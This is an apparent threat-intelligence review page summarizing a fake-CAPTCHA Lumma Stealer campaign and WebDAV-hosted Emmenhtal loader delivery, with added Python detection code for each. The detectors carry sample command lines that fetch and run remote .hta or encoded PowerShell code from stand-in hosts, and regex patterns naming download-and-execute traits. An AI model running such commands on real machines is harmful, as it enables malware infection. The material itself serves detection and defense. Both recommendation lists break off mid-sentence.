One Article Review

The article:
Source: RiskIQ
Identifier: 8580819
Publication date: 2024-09-20 20:53:14 (seen: 2024-09-20 21:18:12)
Title: Behind the CAPTCHA: A Clever Gateway of Malware (recycled)
Text:
## Snapshot
McAfee Labs recently identified a malware campaign that uses fake CAPTCHA pages to distribute malware, including [Lumma Stealer](https://security.microsoft.com/intel-profiles/33933578825488511c30b0728dd3c4f8b5ca20e41c285a56f796eb39f57531ad), an infostealer that targets sensitive data such as cryptocurrency wallets and 2FA browser extensions.

## Description
The campaign is global and spreads through two main vectors: cracked-game download links and phishing emails aimed at GitHub users. In the first, users searching for pirated game software are redirected to malicious CAPTCHA pages, where they are tricked into running a PowerShell script that installs the malware. In the second, phishing emails posing as GitHub security alerts send users to similar CAPTCHA pages. In both cases the page copies a malicious command to the clipboard and instructs the user to paste it into the Windows Run dialog and execute it. Because the victim launches the command themselves, no malicious file is downloaded through the browser or attached to an email for a scanner to inspect, which is how the technique slips past traditional controls. The script is wrapped in several layers of obfuscation and uses the mshta utility to hide its real purpose, which is to download and run Lumma Stealer. The payload is written to the user's Temp folder, a writable location that tends to draw less scrutiny, to lower the chance of detection before the infection completes and data is exfiltrated.

## Recommendations
Microsoft recommends the following mitigations to reduce the impact of this threat. Check the recommendations card for the deployment status of monitored mitigations.

- Check your Office 365 email filtering settings to ensure you block spoofed emails, spam, and emails with malware. Use [Microsoft Defender for Office 365](https://learn.microsoft.com/microsoft-365/security/office-365-security/defender-for-office-365?ocid=magicti_ta_learndoc) for enhanced phishing protection and coverage against new threats and polymorphic variants. Configure Microsoft Defender for Office 365 to [recheck links on click](https://learn.microsoft.com/microsoft-365/security/office-365-security/safe-links-about?ocid=magicti_ta_learndoc) and [delete sent mail](https://learn.microsoft.com/microsoft-365/security/office-365-security/zero-hour-auto-purge?ocid=magicti_ta_learndoc) in response to newly acquired threat intelligence. Turn on [safe attachments policies](https://learn.microsoft.com/microsoft-365/security/office-365-security/safe-attachments-policies-configure?ocid=magicti_ta_learndoc) to check attachments to inbound email.
- Encourage users to use Microsoft Edge and other web browsers that support [SmartScreen](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/web-protection-overview?ocid=magicti_ta_learndoc), which identifies and blocks malicious websites, including phishing sites, scam sites, and sites that host malware.
- Turn on [cloud-delivered protection](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/configure-block-at-first-sight-microsoft-defender-antivirus?ocid=magicti_ta_learndoc) in Microsoft Defender Antivirus, or the equivalent for your antivirus product, to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a majority of new and unknown variants.
- Enforce MFA on all accounts, remove users excluded from MFA, and strictly [require MFA](https://learn.microsoft.com/azure/active-directory/identity-protection/howto-identity-protection-configure-mfa-policy?ocid=magicti_ta_learndoc) from all devices, in all locations, at all times.
- Enable passwordless authentication methods (for example, Windows Hello, FIDO keys, or Microsoft Authenticator) for accounts that support passwordless. For accounts that still require passwords, use authenticator apps like Microsoft Authenticator for MFA. [Refer to this article](https://learn.microsoft.com/azure/active-directory/authentication/concept-authentication-methods?ocid=magicti_ta_learndoc) for the different authentication methods and features.
- For MFA that uses authenticator apps, ensure that the app requires a code to be typed in where possible, as many intrusions where MFA was enabled still succeeded due to users clicking “Yes” on the pr
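The clipboard-to-Run-dialog execution described above leaves two host artifacts a defender can check: the script interpreter spawned with explorer.exe as its parent (the Run dialog is hosted by Explorer), and the HKCU RunMRU registry key, which records what was typed into the Run dialog. The Python below is an added example, not code from the McAfee or Microsoft write-ups. The Sysmon-style process events and RunMRU values are constructed, the hostname captcha-verify.example is hypothetical, and the indicator patterns are assumptions about what a pasted one-liner looks like, not the campaign's literal command line.

```python
"""Hunt for paste-and-run (fake CAPTCHA) execution artifacts.

Added example; not code from the McAfee or Microsoft write-ups. The
process events mimic Sysmon Event ID 1 fields and the registry values
mimic HKCU\\...\\Explorer\\RunMRU; all sample data is constructed.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Interpreters a fake CAPTCHA page typically asks the victim to run.
LOLBINS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "wscript.exe", "cscript.exe"}

# Command-line traits of clipboard-delivered one-liners (assumed patterns,
# not the campaign's literal command line).
INDICATORS = {
    "remote_mshta": re.compile(r"mshta(\.exe)?[\"']?\s+[\"']?https?://", re.I),
    "encoded_cmd": re.compile(r"\s-(e|ec|enc|encodedcommand)\s", re.I),
    "hidden_window": re.compile(r"-w(indowstyle)?\s+hidden", re.I),
    "inline_download": re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bcurl\b", re.I),
    "invoke_expression": re.compile(r"invoke-expression|\biex\b", re.I),
    "base64_decode": re.compile(r"frombase64string", re.I),
}

RUNMRU_KEY = r"HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"


@dataclass
class ProcessEvent:
    parent_image: str
    image: str
    command_line: str


@dataclass
class Alert:
    event: ProcessEvent
    reasons: List[str]


def _basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]


def analyze_process(ev: ProcessEvent) -> Optional[Alert]:
    """Alert on a script host launched from the Run dialog with remote-code traits."""
    if _basename(ev.image) not in LOLBINS:
        return None
    cmd_hits = [name for name, rx in INDICATORS.items() if rx.search(ev.command_line)]
    # The Run dialog is hosted by explorer.exe, so the pasted command's interpreter
    # has explorer.exe as its parent (assumption: no intermediate launcher).
    from_explorer = _basename(ev.parent_image) == "explorer.exe"
    # One trait suffices when explorer.exe is the parent; otherwise require two,
    # so ordinary admin scripts run from cmd or a scheduler are not flagged.
    if (from_explorer and cmd_hits) or len(cmd_hits) >= 2:
        return Alert(ev, cmd_hits + (["launched_from_explorer"] if from_explorer else []))
    return None


def run_detection(events: List[ProcessEvent]) -> List[Alert]:
    return [a for a in (analyze_process(e) for e in events) if a]


def suspicious_runmru(values: Dict[str, str]) -> List[str]:
    """Return RunMRU value names whose stored command matches an indicator.

    RunMRU stores each typed command with a trailing "\\1"; MRUList holds the order.
    """
    hits = []
    for name, data in values.items():
        if name == "MRUList":
            continue
        cmd = data[:-2] if data.endswith("\\1") else data
        if any(rx.search(cmd) for rx in INDICATORS.values()):
            hits.append(name)
    return hits


# Constructed sample data (hostname captcha-verify.example is hypothetical).
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\mshta.exe",
                 "mshta https://captcha-verify.example/verify.hta"),
    ProcessEvent(r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"),
    ProcessEvent(r"C:\Windows\System32\cmd.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"powershell -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1"),
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe",
                 r"notepad C:\Users\victim\notes.txt"),
]

SAMPLE_RUNMRU = {
    "MRUList": "ba",
    "a": "calc\\1",
    "b": "mshta https://captcha-verify.example/verify.hta\\1",
}

if __name__ == "__main__":
    for alert in run_detection(SAMPLE_EVENTS):
        print(alert.event.command_line, "->", ", ".join(alert.reasons))
    print("RunMRU hits:", suspicious_runmru(SAMPLE_RUNMRU))
```

The explorer.exe parent check is what separates this lure from a scheduled task or a helpdesk script that happens to use an encoded command; in an environment where users legitimately launch PowerShell from the Run dialog, tune the indicator list rather than dropping the parent check. The RunMRU scan is useful in forensics after the fact, since the key persists after the process has exited.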
Tags: Ransomware, Spam, Malware, Tool, Threat


Related coverage (1):
Source: RiskIQ
Identifier: 8580783
Publication date: 2024-09-20 19:42:19 (seen: 2024-09-20 20:18:10)
Title: Webdav Malicious File Hosting Powering Stealthy Malware Attacks (recycled)
Text:
## Snapshot
A new attack method has emerged that uses WebDAV servers to host malicious files. The technique, which supports distribution of the Emmenhtal loader (also known as PeakLight), has been under investigation since December 2023.

## Description
The Sekoia TDR team identified over 100 malicious WebDAV servers involved in distributing the Emmenhtal loader. The servers host weaponized “.lnk” files that fetch further malicious payloads through “mshta.exe”, a legitimate, signed Windows executable, so the first stage runs under a trusted binary rather than a dropped one. The variety of final payloads suggests that the WebDAV infrastructure is part of a larger cybercriminal operation offering infrastructure as a service (IaaS) to multiple threat actors. Emmenhtal is notable for its stealthy, memory-only execution and for its role in distributing a range of infostealers worldwide. The wide range of malware delivered indicates that multiple threat actors use the same service, and the repeated use of specific AS providers over several months points to a centralized offering. Its ability to deliver many different payloads while staying stealthy reflects how the threat landscape continues to evolve.

## Microsoft Analysis
Microsoft tracks the memory-only dropper as [PeakLight](https://security.microsoft.com/intel-explorer/articles/a1d5fe95); it uses ZIP files disguised as pirated movies to deploy a PowerShell-based downloader. Because this fileless malware operates inside trusted applications such as PowerShell, it is hard to detect, lets attackers carry out malicious activity discreetly, and evades most security defenses while maintaining persistence.

## Recommendations
Microsoft recommends the following mitigations to reduce the impact of information stealer threats.

- Check your Office 365 email filtering settings to ensure you block spoofed emails, spam, and emails with malware. Use [Microsoft Defender for Office 365](https://learn.microsoft.com/en-us/defender-office-365/mdo-about?ocid=magicti_ta_learndoc) for enhanced phishing protection and coverage against new threats and polymorphic variants. Configure Microsoft Defender for Office 365 to [recheck links on click](https://learn.microsoft.com/en-us/defender-office-365/safe-links-about?ocid=magicti_ta_learndoc) and [delete sent mail](https://learn.microsoft.com/en-us/defender-office-365/zero-hour-auto-purge?ocid=magicti_ta_learndoc) in response to newly acquired threat intelligence. Turn on [safe attachments policies](https://learn.microsoft.com/en-us/defender-office-365/safe-attachments-policies-configure?ocid=magicti_ta_learndoc) to check attachments to inbound email.
- Encourage users to use Microsoft Edge and other web browsers that support [SmartScreen](https://learn.microsoft.com/en-us/defender-endpoint/web-protection-overview?ocid=magicti_ta_learndoc), which identifies and blocks malicious websites, including phishing sites, scam sites, and sites that host malware.
- Turn on [cloud-delivered protection](https://learn.microsoft.com/en-us/defender-endpoint/configure-block-at-first-sight-microsoft-defender-antivirus?ocid=magicti_ta_learndoc) in Microsoft Defender Antivirus, or the equivalent for your antivirus product, to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a majority of new and unknown variants.
- Enforce MFA on all accounts, remove users excluded from MFA, and strictly [require MFA](https://learn.microsoft.com/en-us/entra/id-protection/howto-identity-protection-configure-mfa-policy?ocid=magicti_ta_learndoc) from all devices, in all locations, at all times.
- Enable passwordless authentication methods (for example, Windows Hello, FIDO keys, or Microsoft Authenticator) for accounts that support passwordless. For accounts that still require passwords, use authenticator apps like Microsoft Authenticator for MFA. [Refer to this article](https://learn.m
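When a weaponized .lnk on a WebDAV share launches mshta.exe, the remote content usually appears in the child process command line either as an http(s) URL or as a Windows WebDAV UNC path (the `\\host@SSL@port\DavWWWRoot\...` form the WebClient redirector understands), which plain URL matching misses. The Python below is an added example, not Sekoia's or Microsoft's code: it normalizes those UNC forms to the URL the redirector will actually fetch and flags LOLBins whose arguments resolve to remote content. The command lines are constructed, 203.0.113.10 is a documentation address, and files.example is a hypothetical host.

```python
"""Normalize Windows WebDAV UNC paths and flag LOLBins that load from them.

Added example; not Sekoia's or Microsoft's code. Sample command lines are
constructed: 203.0.113.10 is a documentation address, files.example is
hypothetical.
"""
import re
from typing import Dict, List, Optional

# Windows WebDAV mini-redirector UNC forms and what they resolve to:
#   \\host\DavWWWRoot\path        -> http://host/path
#   \\host@SSL\DavWWWRoot\path    -> https://host/path
#   \\host@SSL@8443\path          -> https://host:8443/path
#   \\host@8080\path              -> http://host:8080/path
WEBDAV_UNC = re.compile(
    r"^\\\\(?P<host>[^\\@]+)(?:@(?P<ssl>SSL))?(?:@(?P<port>\d+))?\\(?P<path>.*)$", re.I)

LOLBINS = ("mshta", "rundll32", "regsvr32", "powershell", "wscript", "cscript", "cmd")
URL_RX = re.compile(r"https?://[^\s\"']+", re.I)
UNC_RX = re.compile(r"\\\\[^\s\"']+")


def webdav_unc_to_url(unc: str) -> Optional[str]:
    """Translate a WebDAV UNC path to the URL the redirector will fetch.

    Returns None when nothing marks the path as WebDAV (no @SSL, no @port,
    no DavWWWRoot), because a bare \\host\share could just as well be SMB.
    """
    m = WEBDAV_UNC.match(unc)
    if not m:
        return None
    segments = [s for s in m["path"].split("\\") if s]
    has_marker = bool(segments) and segments[0].lower() == "davwwwroot"
    if has_marker:
        segments = segments[1:]
    if not (m["ssl"] or m["port"] or has_marker):
        return None
    scheme = "https" if m["ssl"] else "http"
    default_port = 443 if scheme == "https" else 80
    netloc = m["host"]
    if m["port"] and int(m["port"]) != default_port:
        netloc = f"{netloc}:{m['port']}"
    return f"{scheme}://{netloc}/" + "/".join(segments)


def remote_references(command_line: str) -> List[str]:
    """Every http(s) URL or WebDAV UNC in a command line, expressed as a URL."""
    refs = [m.group(0) for m in URL_RX.finditer(command_line)]
    for m in UNC_RX.finditer(command_line):
        url = webdav_unc_to_url(m.group(0))
        if url:
            refs.append(url)
    return refs


def classify_command(command_line: str) -> Dict[str, object]:
    """Flag a LOLBin whose argument points at remote (HTTP or WebDAV) content."""
    lowered = command_line.lower()
    lolbin = next((b for b in LOLBINS
                   if b + ".exe" in lowered or lowered.startswith(b + " ")), None)
    refs = remote_references(command_line)
    verdict = "suspicious" if lolbin and refs else "benign"
    return {"lolbin": lolbin, "remote_refs": refs, "verdict": verdict}


# Constructed sample command lines, as a process-creation sensor would record them.
SAMPLE_COMMANDS = [
    r'"C:\Windows\System32\mshta.exe" \\203.0.113.10@SSL@443\DavWWWRoot\update\vid.hta',
    r"mshta http://files.example/clip.hta",
    r'"C:\Windows\explorer.exe" \\fileserver\share',
    r"powershell -File C:\Scripts\backup.ps1",
]

if __name__ == "__main__":
    for cmd in SAMPLE_COMMANDS:
        print(classify_command(cmd))
```

The normalized URL is what you feed to a proxy or DNS blocklist and what you pivot on when hunting for other hosts on the same provider; the raw UNC form will not match a URL-based indicator list. Blocking outbound WebDAV from workstations (the WebClient service, TCP 80/443 to untrusted hosts) removes the delivery channel entirely where the business does not need it.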
Tags: Ransomware, Spam, Malware, Tool, Threat


The article does not appear to have been picked up from an earlier one.